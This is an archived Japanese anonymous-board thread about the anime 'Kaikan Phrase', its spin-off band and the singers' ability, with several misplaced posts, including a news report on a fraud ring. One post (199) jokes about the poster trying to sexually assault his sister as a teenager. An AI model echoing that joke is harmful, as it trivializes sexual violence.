なぜ目が青いのですか・・・・?に対して海を見すぎたからさ・・・と応えたのに笑った!


159 :名無しさん@お腹いっぱい。:2008/03/12(水) 18:37:56 ID:???0
リアルタイムで友人(男)と見てて吹いたよ

160 :名無しさん@お腹いっぱい。:2008/04/01(火) 21:02:11 ID:???0
「おお、にいちゃん。きれいな目ぇ、しとんなあ。カラコンか?」「これは自前だ」しか覚えてないが

161 :名無しさん@お腹いっぱい。:2008/04/02(水) 22:35:18 ID:???0
”空を見た”じゃなかったっけ

162 :名無しさん@お腹いっぱい。:2008/04/02(水) 22:35:51 ID:???0
>153
序盤に出てきたあのヒト?

163 :タヌ:2008/04/03(木) 23:38:06 ID:???0
設定ではすごいことになってる主人公の歌がいまいちへたくそで、
歌番組で聞いたときはもっとひどい事になっててあまりの糞さにイメージダウンだった。
アルバム出すころまでとにかく曲が無かったんで、
音楽アニメにもかかわらず毎回毎回バカみたいに同じ曲がかかっていたのは芸がなかったな。
主題歌も頻繁にかわってた。

164 :名無しさん@お腹いっぱい。:2008/04/04(金) 00:16:05 ID:???0
複数の振り込め詐欺グループを率いて、仲間から「キング」と呼ばれた男が、警視庁に
再逮捕されました。新たに早稲田大学の現役学生も逮捕され、グループによる
被害総額は10億円以上とみられます。

詐欺などの疑いで逮捕されたのは、早稲田大学4年の細谷卓朗容疑者(22)ら3人です。
このうち「キング」こと戸田雅樹容疑者(29)は、細谷容疑者らに振り込め詐欺の指導をして、
愛知県の60歳の女性から500万円をだまし取ったとみられています。

これまで戸田容疑者のグループがだまし取った総額は、10億円を超えるとみられています。
戸田容疑者の自宅からは、アニメ「セーラームーン」などのフィギュア数百体や1000万円
以上する外国製の高級腕時計、高級自動車などが押収されています。

警視庁は、だまし取った金で戸田容疑者がこれらを買ったとみて調べています。

ANN ※ソース元に動画あり
http://www.tv-asahi.co.jp/ann/news/web/index_w3.html?now=20080403223359_56k


165 :1:2008/04/04(金) 20:27:52 ID:???0
>158
お前も友人もなんか屈折してるなあ
てかあれはキザっていうより・・・・・
受け取り方が極端ってのはペニプリにも共通するよ

166 :1:2008/04/04(金) 20:28:15 ID:???0
しかも確かに・・とか

167 :名無しさん@お腹いっぱい。:2008/04/04(金) 20:33:28 ID:???0
アツローが歌うシーンはちゃんとやってほしかったな
まあ中の人の歌唱力がクズだったのならどうしようもないが

168 :名無しさん@お腹いっぱい。:2008/04/04(金) 21:53:33 ID:???0
シュールはどこらへんがシュールだったんだろ

つかこのアニメの主題歌やったやつらってグレイ以外全滅してるような・・

169 :名無しさん@お腹いっぱい。:2008/04/04(金) 22:57:58 ID:???0
こいつらほとんど10代なんだよな。
篤朗がメンバー唯一の高校生ってことで、
ほか全員25,6だと思ってたよwふけすぎww
ってか無職ばっかww

サンタのファッションだけは十代してた

170 :名無しさん@お腹いっぱい。:2008/04/04(金) 22:58:18 ID:???0
あの膝が

171 :名無しさん@お腹いっぱい。:2008/04/05(土) 05:19:19 ID:???O
http://www6.plala.or.jp/kannauraha/nikki/koram01.htm

172 :名無しさん@お腹いっぱい。:2008/04/05(土) 16:12:13 ID:???0
↑誤爆スマソorz

173 :名無しさん@お腹いっぱい。:2008/04/05(土) 21:40:36 ID:???0
リアルリュシュフェルはメンバーが全員キャラクターと同じ名前になってるのに、なんでmakotoだけmakotoのままなんだい(SAKUYAではない

174 :名無しさん@お腹いっぱい。:2008/04/06(日) 00:42:23 ID:???0
圧労の人だけ不細工で浮いてた
サンタの人は一人だけ原作無視したファッションだった
towaだけいたかどうかすら忘れたw

175 :名無しさん@お腹いっぱい。:2008/04/06(日) 00:43:17 ID:???0
こんなアニメの真似事して音楽するってどんな気分なんだろう。。。

176 :名無しさん@お腹いっぱい。:2008/04/06(日) 08:59:07 ID:???0
咲也、愛音はともかくほかは少女マンガっぽくなくって
ダサダサの名前なのがツボだった
TO-WAの本名は知らんが

177 :名無しさん@お腹いっぱい。:2008/04/06(日) 09:33:09 ID:???0
美形ぞろいだけに作画が大変そうだったな

178 :名無しさん@お腹いっぱい。:2008/04/06(日) 16:35:05 ID:???0
>1
完成度が高いというより、完全に別もんだろう。
主人公が違うって時点で

179 :名無しさん@お腹いっぱい。:2008/04/06(日) 21:37:34 ID:???0
サンタは三男ですか?

180 :名無しさん@お腹いっぱい。:2008/04/06(日) 21:38:24 ID:???0
2008年04月06日やっぱり30分オーバーのデモがあるMGS4
1 名無しさん必死だな 2008/04/06(日) 11:36:20 ID:toZ1lOhv0

        iイ彡 _=三三三f           ヽ
        !イ 彡彡´_ -_=={    二三三ニニニニヽ
       fイ 彡彡ィ 彡イ/    ィ_‐- 、   ̄ ̄ ヽ     し  ま
       f彡イ彡彡ィ/     f _ ̄ ヾユ  fヱ‐ォ     て  る
       f/ミヽ======<|-'いシ lr=〈fラ/ !フ    い  で
       イイレ、´彡f        ヽ 二 _rソ  弋_ { .リ    な  成
       fノ /) 彡!               ィ     ノ ̄l      .い   長
       トヾ__ら 'イf     u    /_ヽ,,テtt,仏  !     :
       |l|ヽ ー  '/          rfイf〃イ川トリ /      .:
       r!lト、{'ー‐    ヽ      ´    ヾミ、  /       :
      / \ゞ    ヽ   ヽ               ヽ /
      ./    \    \   ヽ          /
   /〈     \                 ノ
-‐ ´ ヽ ヽ       \\     \        人



http://www.gamespark.jp/modules/news/index.php?p=5545


5 名無しさん必死だな 2008/04/06(日) 11:41:09 ID:GdV1wyFt0

30分オーバーデモ途中
                           \
       V              マサオ〜
      [ □]    ('A`)      ゴハンヨー
       エ     ヘヘ ノ ヽ         /



6 名無しさん必死だな 2008/04/06(日) 11:41:22 ID:R6bn4xRV0

CoD4 映画の主人公
MGS4 映画を見てる傍観者

181 :名無しさん@お腹いっぱい。:2008/04/14(月) 17:48:33 ID:LHd63JKx0
DVDセットが安く売ってたので勢いで買いました
あらためてみるとわからんこといっぱいあるんだが
最後なんでノエルにさわれたの? 
カオスの書ってなに?
なつみのお兄さんがなんで天使なの?

182 :名無しさん@お腹いっぱい。:2008/04/14(月) 17:50:47 ID:???0
ごめん
スレ間違えた

183 :名無しさん@お腹いっぱい。:2008/04/14(月) 20:19:51 ID:???O
>>176確か「和斗」だかを逆にしてTOWAだった気がする。
ちなみにサンタはクリスマス生まれなんだっけかな?

184 :名無しさん@お腹いっぱい。:2008/04/15(火) 19:48:43 ID:???0
>>173
マコトは元々俳優として活動してたからだったかと

185 :名無しさん@お腹いっぱい。:2008/04/18(金) 17:13:42 ID:???0
高一で家出して、それから一人暮らしのはずのTOWAが、
プロになる前も特にバイトしてる様子もなく、あんな奇麗なマンションに住んでるという不思議

186 :名無しさん@お腹いっぱい。:2008/04/20(日) 00:03:31 ID:???0
>184 本職の歌手じゃないのか
なんか微妙にへたくそな歌だったから納得

187 :名無しさん@お腹いっぱい。:2008/04/20(日) 00:04:10 ID:???0
>>183
何もプレゼントしてくれないサンタ・・・

クラタサナとかクニミヒロみたいなネーミングだなw

188 :名無しさん@お腹いっぱい。:2008/04/23(水) 00:25:27 ID:???0
PSの音ゲー持ってるぜ。東京イリュージョンが入ってないのが残念だた。
DVD化されないかのう?

189 :名無しさん@お腹いっぱい。:2008/04/23(水) 21:14:10 ID:???O
ミッドナイトクロウはクライムの
女ヴォーカルの方が上手かった…気がする

190 :名無しさん@お腹いっぱい。:2008/04/26(土) 12:50:33 ID:???0
つーかマコトが下手糞

191 :名無しさん@お腹いっぱい。:2008/04/27(日) 20:27:41 ID:???0
エミュ?ってこの後期ED以外にも歌出したのかな?

192 :名無しさん@お腹いっぱい。:2008/04/28(月) 11:38:06 ID:???0
mstに出てたよ

エミューってバンドはほかにもいろいろあるから紛らわしかった

193 :名無しさん@お腹いっぱい。:2008/04/28(月) 13:21:53 ID:???0
エミューはまったくアニメを意識してなかったけど、
もともと存在するバンドだったのかな?

194 :名無しさん@お腹いっぱい。:2008/05/01(木) 23:54:47 ID:???0
makotoは元は歌手志望じゃなかったっけ
今はソロでやってるね

195 :名無しさん@お腹いっぱい。:2008/05/15(木) 21:09:03 ID:???0
あんまうまくないよな
まあシロウトに生はキツすぎた・・

196 :名無しさん@お腹いっぱい。:2008/05/15(木) 22:21:16 ID:???0
サクヤパパが美形ハゲだから、息子がハゲないか心配

197 :名無しさん@お腹いっぱい。:2008/05/16(金) 20:59:00 ID:???0
ps版今やるとひどすぎだなw
当時は劣化ビーマニ程度に思ってたけどこれはそういう次元じゃねーww

198 :名無しさん@お腹いっぱい。:2008/05/25(日) 13:51:27 ID:???0
ミンメイにありがとうぐらい言うべき

199 :名無しさん@お腹いっぱい。:2008/05/28(水) 16:49:28 ID:???0
懐かしい、昔は姉がハマって原作読んでた
俺の記憶だと、敦郎と姉は血が繋がって無くて付きあってる所をすっぱ抜かれたり
それと、敦郎と同じ高校に通ってる咲也が愛音との浮気と勘違いしてキレたり

まぁ原作はエロコミックだけどな

アニメならリュシフェルよりエミューの方上手くて当然だけど
なにせリュシフェルはアニメの中のバンドを無理矢理現実化したもの
エミューは函館のインディーズバンドをアニメに取り込んだ物だからな

ちなみに当時厨房の俺が姉に迫って襲おうとしたらフルボッコにされた、これが現実

200 :名無しさん@お腹いっぱい。:2008/05/28(水) 22:57:17 ID:???0
>198
え?誰?

201 :名無しさん@お腹いっぱい。:2008/05/28(水) 22:58:35 ID:???0
>アニメならリュシフェルよりエミューの方上手くて当然だけど
なにせリュシフェルはアニメの中のバンドを無理矢理現実化したもの
エミューは函館のインディーズバンドをアニメに取り込んだ物だからな



リュシュフェルは無理があってくそだったよ。末期はかなりうまくなってたが

エミューもギャップがひどい

劣化ビーマニ、よくわかる

202 :名無しさん@お腹いっぱい。:2008/05/28(水) 22:59:57 ID:???0
アツローと姉の関係とかは、すっぽかしたんじゃなくて設定そのものをかえたんだよ
アニメだとガチの姉弟
マンガはまあ少女恋愛漫画なんでそれむけにアレンジされてる(というかこっちが原作だがw

203 :名無しさん@お腹いっぱい。:2008/05/28(水) 23:14:44 ID:???0
アニメは神の如くアレンジだったとおも

204 :名無しさん@お腹いっぱい。:2008/05/29(木) 06:47:55 ID:???0
アレンジというより最早別物

キャラの名前以外全部違うからな

205 :名無しさん@お腹いっぱい。:2008/05/29(木) 06:52:21 ID:???0
愛音がいじめられるシーンのいじめ描写は笑えた
なんだあれw

206 :名無しさん@お腹いっぱい。:2008/05/29(木) 19:31:25 ID:???0
主人公からいって違うし、1話目にしてすでに原作にいないキャラが中心になってるからな
別にカイフレとして出さなくてもよかったのに。
案外そっちのが原作信者にたたかれずにすんだかも

207 :名無しさん@お腹いっぱい。:2008/05/29(木) 22:17:06 ID:???0
TOWAマンションっていう系列があることを最近知った

TOWA、あんたまさかここの御曹司ですかwwwwwwwww

208 :名無しさん@お腹いっぱい。:2008/05/29(木) 22:22:42 ID:???0
バイトもしてないto-waがあんないい部屋に住んでるのはそのためか

209 :名無しさん@お腹いっぱい。:2008/05/30(金) 23:54:35 ID:???0
うろ覚えだがこのアニメ、バンドが3,4出てたような・・・
楽曲提供したバンドの詳細が気になる。
トーワのいたバンドも歌ってたハズだし

210 :名無しさん@お腹いっぱい。:2008/08/18(月) 16:53:40 ID:jKoLu+mt0
ようつべで何話かあがってるね。
古き良きバンドブームの感じがいいな。

42 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)